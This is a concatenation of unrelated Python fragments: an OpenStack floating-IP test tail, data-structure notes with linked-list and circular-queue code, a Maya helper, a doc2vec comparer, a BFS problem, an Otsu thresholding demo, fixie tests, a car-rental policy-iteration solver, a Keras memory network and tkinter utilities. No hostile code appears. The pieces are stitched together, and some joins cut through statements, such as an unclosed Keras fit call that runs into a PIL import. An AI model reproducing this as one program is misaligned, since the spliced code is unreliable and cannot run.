            'floating ip unset --port ' + ip1,
        )

        json_output = json.loads(self.openstack(
            'floating ip show -f json ' +
            ip1
        ))
        self.assertEqual(
            port_id,
            json_output["port_id"],
        )
'''
Linear list: an ordered sequence of zero or more data elements.

Sequential storage of a linear list:
    Stores the elements in a block of contiguous memory cells, one after another.
    Insertion/deletion time complexity: O(n)

Linked storage of a linear list:
    Uses Node objects to store data; each node holds a data field and a pointer field.
    Insertion/deletion time complexity: O(1)

Circular linked list:
    Point the last element's next pointer back to head.

Doubly linked list:
    Add a prior pointer that points to the previous node.
    Insertion order: s.prior = p; s.next = p.next; p.next.prior = s; p.next = s
'''
'''
Stack: a linear list where insertion and deletion happen only at the tail (top).

Sequential storage of a stack:
    Two stacks sharing space: two stacks share one array, one growing from the
    head and one from the tail, so the two stacks complement each other.

Linked storage of a stack:

Infix-to-postfix conversion:
    Scan the infix expression from left to right. Every number is output
    immediately and becomes part of the postfix expression. For an operator,
    compare its precedence with the operator on top of the stack: if it is a
    right parenthesis, or its precedence is lower than the top of the stack
    (multiplication/division before addition/subtraction), pop and output the
    top elements, then push the current operator; repeat until the full
    postfix expression has been produced.

Postfix evaluation:
    Scan the postfix expression from left to right. Push numbers onto the
    stack; on an operator, pop the top two numbers, apply the operator, and
    push the result, until the computation is finished.
'''
'''
Queue: a linear list that allows insertion only at one end and deletion only
at the other end.

Circular queue: a sequential storage structure whose head and tail wrap around.
    front points to the head of the queue, rear points to the tail
    (the tail slot stores no data).
    Queue is empty when: front == rear
    Queue is full when:  (rear + 1) % QueueSize == front
    Queue length:        (rear - front + QueueSize) % QueueSize
    QueueSize includes the slot that stores no data.
'''
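# Illustration only (not part of the original notes): a minimal circular-queue
# sketch that applies the front/rear bookkeeping described above. The class
# name `CircularQueue`, its constructor argument, and the 'error'/'OK' return
# convention are assumptions made for this example, mirroring the LinkedList
# below rather than any original implementation.
class CircularQueue():
    def __init__(self, capacity=5):
        # One extra slot is kept empty, as the notes state, so
        # QueueSize = capacity + 1.
        self.queue_size = capacity + 1
        self.data = [None] * self.queue_size
        self.front = 0
        self.rear = 0

    def isempty(self):
        # Queue empty: front == rear
        return self.front == self.rear

    def isfull(self):
        # Queue full: (rear + 1) % QueueSize == front
        return (self.rear + 1) % self.queue_size == self.front

    def length(self):
        # Queue length: (rear - front + QueueSize) % QueueSize
        return (self.rear - self.front + self.queue_size) % self.queue_size

    def enqueue(self, value):
        if self.isfull():
            return 'error'
        self.data[self.rear] = value
        self.rear = (self.rear + 1) % self.queue_size
        return 'OK'

    def dequeue(self):
        if self.isempty():
            return 'error'
        value = self.data[self.front]
        self.front = (self.front + 1) % self.queue_size
        return value

# Example usage of the sketch above:
#   q = CircularQueue(3); q.enqueue(1); q.enqueue(2); q.length()  -> 2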
class Node():
    def __init__(self, data, next=None):
        self.data = data
        self.next = next


class LinkedList():
    '''Singly linked list implementation'''

    def __init__(self, head: Node = Node(-1)):
        self.__head = head

    def isempty(self):
        return self.__head.next == None

    def addelement(self, value):
        '''Append an element at the end'''
        p = self.__head
        q = Node(value)
        while p.next != None:
            p = p.next
        p.next = q
        q.next = None
        # if p.next == None:
        #     p.next = elem
        #     elem.next = None
        # else:
        #     q = p.next
        #     elem.next = q
        #     p.next = elem

    def showlist(self) -> list:
        '''Return the contents as a list'''
        p = self.__head
        result = []
        if p.next == None:
            return result
        else:
            while p.next != None:
                q = p.next
                result.append(q.data)
                p = q
            return result

    def getelement(self, index: int) -> int or str:
        '''Get the value at position index'''
        p = self.__head.next
        j = 1
        while p != None and j < index:
            p = p.next
            j += 1
        if p == None or j > index:
            return 'error'
        return p.data

    def insertelement(self, value, index: int) -> str:
        '''Insert before position index'''
        p = self.__head
        node = Node(value)
        j = 1
        while p.next != None and j < index:
            p = p.next
            j += 1
        if p.next == None or j > index:
            return 'error'
        else:
            q = p.next
            node.next = q
            p.next = node
            return 'OK'

    def deletenode(self, index: int) -> int or str:
        p = self.__head
        j = 1
        while p != None and j < index:
            p = p.next
            j += 1
        if p.next == None or j > index:
            return 'error'
        else:
            q = p.next
            p.next = q.next
            return q.data


if __name__ == '__main__':
    lista = LinkedList()
    print(lista.isempty())
    lista.addelement(1)
    lista.addelement(2)
    # lista.addelement(c)
    print(lista.showlist())
    print(lista.insertelement(3, 1))
    print(lista.getelement(3))
    print(lista.showlist())
    print(lista.deletenode(2))
    print(lista.showlist())
<filename>reveries/maya/tools/avalonideditor/commands.py
from maya import cmds


def remove_id_edit(node):
    # (NOTE) No need to unload reference in prior

    def remove_edit(attr):
        cmds.referenceEdit(attr,
                           failedEdits=True,
                           successfulEdits=True,
                           editCommand="setAttr",
                           removeEdits=True)

    remove_edit(node + ".AvalonID")
    remove_edit(node + ".verifier")


def list_id_edit(reference_node):
    edits = cmds.referenceQuery(reference_node,
                                editNodes=True,
                                editAttrs=True,
                                editCommand="setAttr")

    id_edits = set()
    for edit in edits:
        if edit.endswith(".AvalonID") or edit.endswith(".verifier"):
            id_edits.add(edit)

    return id_edits
<filename>compare.py
#python example to infer document vectors from trained doc2vec model
import gensim.models as g
import codecs
import sys
import os
import scipy.spatial.distance

NOISY = not os.environ.get("QUIET", False)

if len(sys.argv) != 3:
    if NOISY:
        print("Error")
        print("Please provide two files as arguments")
    sys.exit()


def clean(t):
    return t.read().strip().split()


def infer(t):
    return m.infer_vector(clean(t), alpha=start_alpha, steps=infer_epoch)


#parameters
model = "apnews_data/doc2vec.bin"

#inference hyper-parameters
start_alpha = 0.01
infer_epoch = 1000

#load model
m = g.Doc2Vec.load(model)

v1 = infer(open(sys.argv[1]))
if NOISY:
    print("Vector for {} = {}".format(sys.argv[1], v1))
v2 = 
infer(open(sys.argv[2])) if NOISY: print("Vector for {} = {}".format(sys.argv[2], v2)) d = scipy.spatial.distance.cosine(v1,v2) if NOISY: print("Distance between documents {}".format(d)) else: print(d) import math from collections import deque, defaultdict n = int(raw_input()) m = int(raw_input()) graph = defaultdict(list) visited = {} while m > 0: line = raw_input().split() p, q = int(line[0]), int(line[1]) graph[p].append(q) graph[q].append(p) m -= 1 def bfs(g, start): visited[start] = True q = deque([start]) group_len = 0 while q: node = q.popleft() group_len += 1 for neighbour in g[node]: if not visited.get(neighbour, False): visited[neighbour] = True q.append(neighbour) return group_len total_cost = 0 for key in graph.keys(): if key not in visited: group_len = bfs(graph, key) total_cost += math.ceil(math.sqrt(group_len)) n -= group_len total_cost += n print int(total_cost) #https://stackoverflow.com/a/7071358/7530778 __version__ = "0.1.0rc2" s = __version__.find("rc") __version_info__ = tuple(map(int, __version__[:s].split('.'))) """ Otsu's binarization algorithm """ # Import required packages: import cv2 from matplotlib import pyplot as plt def show_img_with_matplotlib(color_img, title, pos): """Shows an image using matplotlib capabilities""" # Convert BGR image to RGB img_RGB = color_img[:, :, ::-1] ax = plt.subplot(2, 2, pos) plt.imshow(img_RGB) plt.title(title) plt.axis('off') def show_hist_with_matplotlib_gray(hist, title, pos, color, t=-1): """Shows the histogram using matplotlib capabilities""" ax = plt.subplot(2, 2, pos) # plt.title(title) plt.xlabel("bins") plt.ylabel("number of pixels") plt.xlim([0, 256]) plt.axvline(x=t, color='m', linestyle='--') plt.plot(hist, color=color) # Create the dimensions of the figure and set title and color: fig = plt.figure(figsize=(10, 10)) plt.suptitle("Otsu's binarization algorithm", fontsize=14, fontweight='bold') fig.patch.set_facecolor('silver') # Load the image and convert it to grayscale: image = cv2.imread('leaf.png') gray_image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY) # Calculate histogram (only for visualization): hist = cv2.calcHist([gray_image], [0], None, [256], [0, 256]) # Threshold the image aplying Otsu's algorithm: ret1, th1 = cv2.threshold(gray_image, 0, 255, cv2.THRESH_TRUNC + cv2.THRESH_OTSU) # Plot all the images: show_img_with_matplotlib(image, "image", 1) show_img_with_matplotlib(cv2.cvtColor(gray_image, cv2.COLOR_GRAY2BGR), "gray img", 2) show_hist_with_matplotlib_gray(hist, "grayscale histogram", 3, 'm', ret1) show_img_with_matplotlib(cv2.cvtColor(th1, cv2.COLOR_GRAY2BGR), "Otsu's binarization", 4) # Show the Figure: plt.show() """Tests request handler object.""" import os import time import tempfile import pytest import tornado.web from tornado.httpclient import HTTPError import fixie.jsonutils as json from fixie.environ import ENV from fixie.request_handler import RequestHandler from fixie.tools import (fetch, verify_user_remote, verify_user_local, flock, next_jobid, detached_call, waitpid, register_job_alias, jobids_from_alias, jobids_with_name, default_path) try: from fixie_creds.cache import CACHE HAVE_CREDS = True except ImportError: HAVE_CREDS = False skipif_no_creds = pytest.mark.skipif(not HAVE_CREDS, reason="fixie-creds is not installed.") class NameObjectRequest(RequestHandler): schema = {'name': {'type': 'string'}} def post(self): name = self.request.arguments['name'] self.write({'nomen': 'My name is '+ name}) class MockVerifyRequest(RequestHandler): """Only will verify if user == token""" schema = 
{'user': {'type': 'string'}, 'token': {'type': 'string'}} def post(self): if self.request.arguments['user'] == self.request.arguments['token']: rtn = {'verified': True, 'message': '', 'status': True} else: rtn = {'verified': False, 'message': '', 'status': True} self.write(rtn) APP = tornado.web.Application([ (r"/", NameObjectRequest), (r"/verify", MockVerifyRequest), ]) @pytest.fixture def app(): return APP @pytest.mark.gen_test def test_fetch(http_client, base_url): body = {"name": "<NAME>"} response = yield fetch(base_url, body) assert response == {"nomen": 'My name is <NAME>'} @pytest.mark.gen_test def test_verify_user_remote_valid(http_client, base_url): valid, msg, status = verify_user_remote("me", "me", base_url) assert valid assert status @pytest.mark.gen_test def test_verify_user_remote_invalid(http_client, base_url): valid, msg, status = verify_user_remote("me", "you", base_url) assert not valid assert status @skipif_no_creds def test_verify_user_local(credsdir): # some set up user = 'grammaticus' email = '<EMAIL>' assert not CACHE.user_exists(user) token, flag = CACHE.register(user, email) # test valid valid, message, status = verify_user_local(user, token) assert valid assert status # test invalid valid, message, status = verify_user_local(user, '101010') assert not valid assert status def test_flock(): fname = 'flock-test' lock = fname + '.lock' if os.path.exists(fname): os.remove(fname) if os.path.exists(lock): os.remove(lock) with flock(fname, timeout=10.0) as fd: # basic checks assert fd != 0 assert os.path.exists(lock) # check that the lock is actually working with flock(fname, timeout=0.01, sleepfor=0.001, raise_errors=False) as fe: assert fe == 0 assert os.path.exists(lock) assert not os.path.exists(lock) def test_next_jobid(jobfile): assert 0 == next_jobid() assert 1 == next_jobid() assert 2 == next_jobid() with open(jobfile) as f: n = f.read() n = int(n.strip()) assert 3 == n def test_job_aliases(jobaliases): register_job_alias(1, 'me', name='some-sim', project='myproj') register_job_alias(42, 'me', name='some-sim', project='myproj') jids = jobids_from_alias('me', name='some-sim', project='myproj') assert jids == {1, 42} jids = jobids_from_alias('me', name='bad', project='nope') assert jids == set() # test from name register_job_alias(43, 'you', name='some-sim', project='other') jids = jobids_with_name('some-sim') assert jids == {1, 42, 43} jids = jobids_with_name('bad-name') assert jids == set() def test_detached_call(): with ENV.swap(FIXIE_DETACHED_CALL='test'), tempfile.NamedTemporaryFile('w+t') as f: child_pid = detached_call(['env'], stdout=f) status = waitpid(child_pid, timeout=10.0) f.seek(0) s = f.read() assert status assert os.getpid() != child_pid assert 'FIXIE_DETACHED_CALL=test' in s @pytest.mark.parametrize('path, name, project, jobid, exp', [ ('x', '', '', -1, '/x'), ('/y', '', '', -1, '/y'), ('x/y', '', '', -1, '/x/y'), ('/x/y/z', '', '', -1, '/x/y/z'), ('', 'sim', '', -1, '/sim.h5'), ('', 'sim', 'proj', -1, '/proj/sim.h5'), ('', '', 'proj', 42, '/proj/42.h5'), ]) def test_default_path(path, name, project, jobid, exp): obs = default_path(path, name=name, project=project, jobid=jobid) assert exp == obs # MIT License # Copyright (c) 2020 <NAME> # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # 
copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import numpy as np import matplotlib import matplotlib.pyplot as plt import seaborn as sns import math ACTIONS = [-5, -4, -3, -2, -1, 0, 1, 2, 3, 4, 5] CAR_RENTAL_COST = 10 CAR_MOVE_COST = 2 MAX_CARS = 20 MAX_MOVE = 5 REQUEST_1_LAMBDA = 3 DROPOFF_1_LAMBDA = 3 REQUEST_2_LAMBDA = 4 DROPOFF_B_LAMBDA = 2 DISCOUNT = 0.9 class CarRental: def __init__(self): self.reset() return def step(self, state, action): """ Run one timestep of the environment's dynamics. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B action (int): The number of cars to be moved Returns: (Tuple[Tuple[int, int], float]): The new state of the system, and its correspondent reward """ morning_n1 = int(state[0] - action) morning_n2 = int(state[1] + action) new_state = (morning_n1, morning_n2) reward = self.get_reward(new_state) return new_state, reward def reset(self): """ Resets the state of the environment and returns an initial observation. """ self._poisson_prob = {} self.state_values = np.zeros((MAX_CARS + 1, MAX_CARS + 1)) self.policy = np.zeros((MAX_CARS + 1, MAX_CARS + 1), np.int32) self._probs_1, self._rewards_1 = self.precompute_model( REQUEST_1_LAMBDA, DROPOFF_1_LAMBDA) self._probs_2, self._rewards_2 = self.precompute_model( REQUEST_2_LAMBDA, DROPOFF_B_LAMBDA) return def render(self): """ Plots the current value table and the current policy """ # plot value table fig, ax = plt.subplots(1, 2, figsize=(15, 5)) sns.heatmap(self.state_values, cmap="gray", ax=ax[0]) ax[0].set_ylim(0, MAX_CARS) ax[0].set_title("Value table V_π") # plot policy cmaplist = [plt.cm.RdBu(i) for i in range(plt.cm.RdBu.N)] dRbBu = matplotlib.colors.LinearSegmentedColormap.from_list( 'dRdBu', cmaplist, plt.cm.RdBu.N) sns.heatmap(self.policy, vmin=-5, vmax=5, cmap=dRbBu, ax=ax[1], cbar_kws={"ticks": ACTIONS, "boundaries": ACTIONS}) ax[1].set_ylim(0, MAX_CARS) ax[1].set_title("Policy π") plt.show() return fig, ax def get_transition_probability(self, state, new_state): """ Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B new_state (Tuple[int, int]): A possible future state of the environment Returns: (float): The probability that the system transitions from a state `s` to a state `s'`. """ return self._probs_1[(state[0], new_state[0])] * self._probs_2[(state[1], new_state[1])] def get_reward(self, state): """ Computes the reward for the given state. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B Returns: (float): The expected reward for the given state """ return self._rewards_1[state[0]] + self._rewards_2[state[1]] def get_valid_action(self, state, action): """ Return an action that is compatible with the current state of the system. 
For example, if there are 2 cars available at location 1, and the action is to move 3 cars from location 1, the function will clip the value at 2. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B action (int): The number of cars to be moved Returns: (int): a feasible number of cars to be moved """ cars_at_1, cars_at_2 = state # Jack can't move more cars than he has available action = max(-cars_at_2, min(action, cars_at_1)) # Jack can move at most 5 cars action = max(-MAX_MOVE, min(MAX_MOVE, action)) return action def get_available_actions(self, state): """ Return the list of actions compatible with the current state of the system. Args: state (Tuple[int, int]): A tuple storing the number of available locations, respectively at A and B Returns: (List[int]): The list of actions compatible with the current state of the system. """ return list(range(max(-MAX_CARS, - state[1]), min(MAX_CARS, state[0]) + 1)) def poisson_probability(self, n, lam): """ Computes the probability that the number drawn from a poisson distribution is `n`, given a lamdda of `lam`. `$p = e^(-λ) * (λ^n / n!)$ Args: n (int): the number expected to be drawn from the distribution lam (int): the λ parameter of the poisson distribution Returns: (float): the probability that the number is `n` """ key = (n, lam) if key not in self._poisson_prob: self._poisson_prob[key] = math.exp(-lam) * \ (math.pow(lam, n) / math.factorial(n)) return self._poisson_prob[key] def precompute_model(self, lambda_requests, lambda_dropoffs): """ Precomputes the model dynamics for efficiency: the reward and the transition probabilities. Calculates the expected rewards for a range of requests from 0 to MAX_CARS + max(ACTIONS) + 1, and stores them into a privare array. Calculates the probability that the system transitions from a state `s` to a state `s'`. Args: lambda_requests (int): the λ parameter of the poisson distribution that describes the requests lambda_dropoffs (int): the λ parameter of the poisson distribution that describes the dropoffs Returns: (Tuple[numpy.ndarray, numpy.ndarray]): The array of system transitions probabilities and the array of expected rewards """ P, R = {}, {} requests = 0 for requests in range(MAX_CARS + max(ACTIONS) + 1): request_prob = self.poisson_probability(requests, lambda_requests) for n in range(MAX_CARS + max(ACTIONS) + 1): if n not in R: R[n] = 0. R[n] += CAR_RENTAL_COST * request_prob * min(requests, n) dropoffs = 0 for dropoffs in range(MAX_CARS + max(ACTIONS) + 1): dropoffs_prob = self.poisson_probability( dropoffs, lambda_dropoffs) for n in range(MAX_CARS + max(ACTIONS) + 1): satisfied_requests = min(requests, n) new_n = max( 0, min(MAX_CARS, n + dropoffs - satisfied_requests)) if (n, new_n) not in P: P[(n, new_n)] = 0. 
P[(n, new_n)] += request_prob * dropoffs_prob return P, R def bellman_expectation(self, state, action): """ Solves the bellman expectation equation for given state V(s) = p(s, r | s' π(s)) * (R(s) + γ * V(s')) Args: state (Tuple[int, int]): a tuple storing the number of available locations, respectively at A and B action (int): The number of cars to be moved Returns: (float): the value V(s) of the current state pair """ action = self.get_valid_action(state, action) (morning_n1, morning_n2), r = self.step(state, action) state_value = -CAR_MOVE_COST * abs(action) for new_n1 in range(MAX_CARS + 1): for new_n2 in range(MAX_CARS + 1): p = self.get_transition_probability( (morning_n1, morning_n2), (new_n1, new_n2)) state_value += p * \ (r + DISCOUNT * self.state_values[new_n1, new_n2]) return state_value def policy_evaluation(self, theta=1e-3): """ Computes the true value table for the current policy using iterative policy evaluation. At the end of the process it updates the state-value table with the newly computed value function. Returns: (numpy.ndarray): The value function of the current policy stored as a 2D array """ new_values = np.empty_like(self.state_values) while True: # for each state s ∈ S for available_A in range(MAX_CARS + 1): for available_B in range(MAX_CARS + 1): state = (available_A, available_B) # a = π(s) action = self.policy[available_A, available_B] # V(s) = p(s, r | s' π(s)) * (R(s) + γ * V(s')) new_state_value = self.bellman_expectation(state, action) # according the the original lisp code, the evaluation is performed asynchronously: # http://incompleteideas.net/book/code/jacks.lisp new_values[state] = new_state_value delta = np.max(np.abs(self.state_values - new_values)) print("\t\tValue delta {:.5f}\t\t ".format(delta), end="\r") self.state_values = new_values.copy() new_values = np.empty_like(self.state_values) if delta < theta: print() return raise ValueError( "The value table did not converge. Check your inputs or look for bugs.") def policy_improvement(self): """ Makes one step of policy improvement following a greedy policy. For each state of the model, it iterates through all the feasible actions and finds the greediest one. The current policy is updated synchronously for each state, i.e. only after all the states have been visited. Returns: (bool): True if the policy has not improved """ new_policy = np.empty_like(self.policy) # for each state s ∈ S for available_A in range(MAX_CARS + 1): for available_B in range(MAX_CARS + 1): state = (available_A, available_B) best_action = self.policy[state] best_value = -float("inf") for action in self.get_available_actions(state): value = self.bellman_expectation(state, action) # print(state, action, value) if value > best_value: best_value = value best_action = action new_policy[available_A, available_B] = best_action converged = (new_policy == self.policy).all() self.policy = new_policy.copy() return converged def policy_iteration(self, plot=False): """ Computes the optimal policy π* using policy iteration. Convergence is guaranteed since the MDP has only a finite number of policies. Note that the optimal policy might not be unique. 
Args: plot (bool): If true, self.render() will be called at each evaluation/iteration step Returns: (numpy.ndarray): The optimal policy """ iteration = 1 if plot: self.render() while True: # log print("Iterating through policy {}".format(iteration)) # policy evaluation to update the value table print("\tEvaluating policy {}".format(iteration)) self.policy_evaluation() # policy improvement to update the current policy, based on the new value table print("\tImproving policy {}".format(iteration)) converged = self.policy_improvement() # has π converged to π*? I.e. is the current policy stable? if converged: print("Policy is stable. π converged to π*") return # plot if plot: self.render() iteration += 1 raise ValueError( "The policy did not converge. Check your inputs or look for bugs.") if __name__ == "__main__": env = CarRental() env.policy_iteration(True) # coding: utf-8 import os import nbimporter from keras.models import Sequential, Model from keras.layers.embeddings import Embedding from keras.preprocessing.sequence import pad_sequences from keras.layers import Input, Activation, Dense, Permute, Dropout, add, dot, concatenate from keras.layers import LSTM from keras.utils.data_utils import get_file from functools import reduce from nltk.tokenize import word_tokenize import tarfile from text_processing import * import numpy as np import pickle import keras import re import random def parse_text(lines, only_supporting=False): # Make two new Lists/Arrays to store data and text data = [] text = [] # Read the text from bAbI Dataset for line in lines: # Lines input from Text # Format: ID Line line = line.decode('utf-8').strip() # Separate ID and Text from Input Lines # Lines contain both Text as well as Question Answers id, line = line.split(' ', 1) # Convert ID to int type id = int(id) # If ID = 1, it is the text/story if id == 1: text = [] # If there is a tab space in the input lines, it contains Question, Answer, Supporting Text ID # and the Supporting Line Number in the Text # Format: Question? Answer Line_Number if '\t' in line: ques, ans, supporting = line.split('\t') # Take in the Question and Tokenize it into words ques = tokenize(ques) subtext = None # Keep only the supporting text from Question; only_supporting = True if only_supporting: # Map the Supporting Text ID as int supporting = list(map(int, supporting.split())) # subtext: List of the sentences supporting the Questions subtext = [text[i - 1] for i in supporting] else: # Contains all the related Text Lines in the file # Relation using Supporting ID subtext = [x for x in text if x] # Data containes tokenized first two sentences, then the answers. # All tokenized words in form of arrays # Tokenized text in form of array of array # All this in a List # data: array of all such Lists # Format: [([[First sentence Tokeinized],[Second Sentence Tokenized]],[Question with Answer Tokenized]), ....] data.append((subtext, ques, ans)) text.append('') else: sent = tokenize(line) text.append(sent) return data # Read the file, retrieve the stories and convert sentences into a single story def get_stories(file, only_supporting=False, max_length=None): # Data containes tokenized first two sentences, then the answers. # All tokenized words in form of arrays # Tokenized text in form of array of array # All this in a List # data: array of all such Lists # Format: [([[First sentence Tokeinized],[Second Sentence Tokenized]],[Question with Answer Tokenized]), ....] 
data = parse_text(file.readlines(), only_supporting=only_supporting) flatten = lambda data: reduce(lambda x, y: x + y, data) # flatten: Takes two sentences and makes one array, 2nd array of Question answer in a list # Format: [([First sentence Tokeinized, Second Sentence Tokenized],[Question with Answer Tokenized]), ....] data = [(flatten(text), question, answer) for text, question, answer in data if not max_length or len(flatten(text)) < max_length] return data class memoryNetwork(object): FILE_NAME = 'model' VOCAB_FILE_NAME = 'model_vocab' def __init__(self): if (os.path.exists(memoryNetwork.FILE_NAME) and os.path.exists(memoryNetwork.VOCAB_FILE_NAME)): self.load() # else: self.train() self.store() def load(self): self.model = keras.models.load_model(memoryNetwork.FILE_NAME) with open(memoryNetwork.VOCAB_FILE_NAME, 'rb') as file: self.word_id = pickle.load(file) def store(self): self.model.save(memoryNetwork.FILE_NAME) with open(memoryNetwork.VOCAB_FILE_NAME, 'wb') as file: pickle.dump(self.word_id, file) def train(self): # Load the bAbI Dataset try: dataPath = get_file('babi-tasks-v1-2.tar.gz', origin='https://s3.amazonaws.com/text-datasets/babi_tasks_1-20_v1-2.tar.gz') except: print('Error downloading dataset, please download it manually:\n' '$ wget http://www.thespermwhale.com/jaseweston/babi/tasks_1-20_v1-2.tar.gz\n' '$ mv tasks_1-20_v1-2.tar.gz ~/.keras/datasets/babi-tasks-v1-2.tar.gz') raise tar = tarfile.open(dataPath) # Load the Single Supporting Fact and Two Supporting Fact files challenges = { # QA1 with 10,000 samples 'single_supporting_fact_10k': 'tasks_1-20_v1-2/en-10k/qa1_single-supporting-fact_{}.txt', # QA2 with 10,000 samples 'two_supporting_facts_10k': 'tasks_1-20_v1-2/en-10k/qa2_two-supporting-facts_{}.txt', } challenge_type = 'single_supporting_fact_10k' challenge = challenges[challenge_type] # Extract the Text from single_supporting_fact_10k file print('Extracting stories for the challenge:', challenge_type) # Load the Testing and Training Text Data train_stories = get_stories(tar.extractfile(challenge.format('train'))) test_stories = get_stories(tar.extractfile(challenge.format('test'))) # Initialize vocabulary as as Set # Create a Vocabulary list with all words occuring only once vocab = set() for text, ques, answer in train_stories + test_stories: vocab |= set(text + ques + [answer]) # Sort the words in Vocabulary List vocab = sorted(vocab) # Get the max length of the Vocabulary, text and Questions vocab_size = len(vocab) + 1 # text_max_length: length of th subtext; no. of subtexts text_max_length = max(list(map(len, (x for x, _, _ in train_stories + test_stories)))) # ques_max_length: length of questions in input. ques_max_length = max(list(map(len, (x for _, x, _ in train_stories + test_stories)))) # Vectorize the Training and Testing Data self.word_id = dict((c, i + 1) for i, c in enumerate(vocab)) # inputs_train: Matrix of Arrays; Arrays containing vectorized sentences # ques_train: Matrix of Arrays; Each array has 4 values; Each value corresponds to a character. 
# answers_train: Matrix of Arrays; Each array contains a single "1", index corresponding to answer inputs_train, ques_train, answers_train = vectorize_text(train_stories, self.word_id, text_max_length, ques_max_length) inputs_test, ques_test, answers_test = vectorize_text(test_stories, self.word_id, text_max_length, ques_max_length) # Define Placeholders input_sequence = Input((text_max_length,)) question = Input((ques_max_length,)) # ---------------------------------- Encode the Data ---------------------------------------- # Embed the input sequence into a sequence of vectors input_encoder_m = Sequential() input_encoder_m.add(Embedding(input_dim=vocab_size, output_dim=64)) input_encoder_m.add(Dropout(0.3)) # Output: (samples, text_maxlen, embedding_dim) # Embed the input into a sequence of vectors of size ques_max_length input_encoder_c = Sequential() input_encoder_c.add(Embedding(input_dim=vocab_size, output_dim=ques_max_length)) input_encoder_c.add(Dropout(0.3)) # output: (samples, story_maxlen, query_maxlen) # Embed the question into a sequence of vectors question_encoder = Sequential() question_encoder.add(Embedding(input_dim=vocab_size, output_dim=64, input_length=ques_max_length)) question_encoder.add(Dropout(0.3)) # output: (samples, query_maxlen, embedding_dim) # Encode input sequence and questions (which are indices) # to sequences of dense vectors input_encoded_m = input_encoder_m(input_sequence) input_encoded_c = input_encoder_c(input_sequence) question_encoded = question_encoder(question) # compute a 'match' between the first input vector sequence # and the question vector sequence # shape: `(samples, story_maxlen, query_maxlen)` match = dot([input_encoded_m, question_encoded], axes=(2, 2)) match = Activation('softmax')(match) # add the match matrix with the second input vector sequence response = add([match, input_encoded_c]) # (samples, story_maxlen, query_maxlen) response = Permute((2, 1))(response) # (samples, query_maxlen, story_maxlen) # concatenate the match matrix with the question vector sequence answer = concatenate([response, question_encoded]) # the original paper uses a matrix multiplication for this reduction step. # we choose to use a RNN instead. answer = LSTM(32)(answer) # (samples, 32) # one regularization layer -- more would probably be needed. 
answer = Dropout(0.3)(answer) answer = Dense(vocab_size)(answer) # (samples, vocab_size) # we output a probability distribution over the vocabulary answer = Activation('softmax')(answer) # build the final model self.model = Model([input_sequence, question], answer) self.model.compile(optimizer='rmsprop', loss='categorical_crossentropy', metrics=['accuracy']) # Train the Model self.model.fit([inputs_train, ques_train], answers_train, batch_size=32, epochs=120, validation_data=([inputs_test, ques_test], answers_test)from PIL import Image import tkinter as tk from tkinter import filedialog from tkinter import messagebox from os import listdir from os.path import isfile, join images_opened = [] root= tk.Tk() canvas1 = tk.Canvas(root, width = 300, height = 300, bg = 'white', relief = 'raised') canvas1.pack() label1 = tk.Label(root, text='PNGs to PDF', bg = 'white') label1.config(font=('helvetica', 20)) canvas1.create_window(150, 60, window=label1) def getFile (): global images_opened images_opened = [] import_file_path = filedialog.askopenfilename() slice_index = [pos for pos, char in enumerate(import_file_path) if char == '/'] dir_path = import_file_path[:slice_index[-1]] imgs = [f for f in listdir(dir_path) if f.endswith('.png')] def getOrder(img): order = img[-6:-4] if img[-6:-4].isdigit() else img[-5] return int(order) imgs_tuple = [ (img,getOrder(img)) for img in imgs] imgs_tuple_SR = sorted(imgs_tuple, key=lambda t: t[1]) imgs_path = [join(dir_path,file) for file, i in imgs_tuple_SR] for i in imgs_path: im_t = Image.open(i) images_opened.append(im_t.convert('RGB')) print(str(len(images_opened)) + " images were saved \nClick Convert to PDF button") browseButton = tk.Button(text="Select First File", command=getFile, bg='green', fg='white', font=('helvetica', 12, 'bold')) canvas1.create_window(150, 130, window=browseButton) def convertToPdf (): global images_opened export_file_path = filedialog.asksaveasfilename(defaultextension='.pdf') images_opened[0].save(export_file_path,save_all=True, append_images=images_opened[1:]) print("Saved pdf file completely ") saveAsButton = tk.Button(text='Convert to PDF', command=convertToPdf, bg='green', fg='white', font=('helvetica', 12, 'bold')) canvas1.create_window(150, 180, window=saveAsButton) def exitApplication(): MsgBox = tk.messagebox.askquestion ('Exit Application','Are you sure you want to exit the application',icon = 'warning') if MsgBox == 'yes': root.destroy() exitButton = tk.Button (root, text='Exit Application',command=exitApplication, bg='brown', fg='white', font=('helvetica', 12, 'bold')) canvas1.create_window(150, 230, window=exitButton) root.mainloop() <filename>_todo/programme/listebar.py # -*- coding: utf-8 -*- import tkinter import tkinter.scrolledtext root = tkinter.Tk () o = tkinter.scrolledtext.ScrolledText (root) for k in range (0,100) : o.insert (tkinter.END, "ligne " + str (k)) o.pack () def print_file () : # voir chapitre sur les événements print (o.selection_get ()) # idem b = tkinter.Button (root, text = "print") b.config (command = print_file) # idem b.pack () root.mainloop () # idem <gh_stars>0 #!/usr/bin/env python # Set up subdirectories for the various MISMIP+ experiments: # Ice0, Ice1r, Ice1ra, Ice1rr, Ice1rax, Ice1rrx, Ice2r, Ice2ra, Ice2r, Ice2rax, Ice2rrx # Note: Ice1rax is the optional extension of Ice1ra from year 200 to 1000, # and similarly for the other Ice*x experiments. 
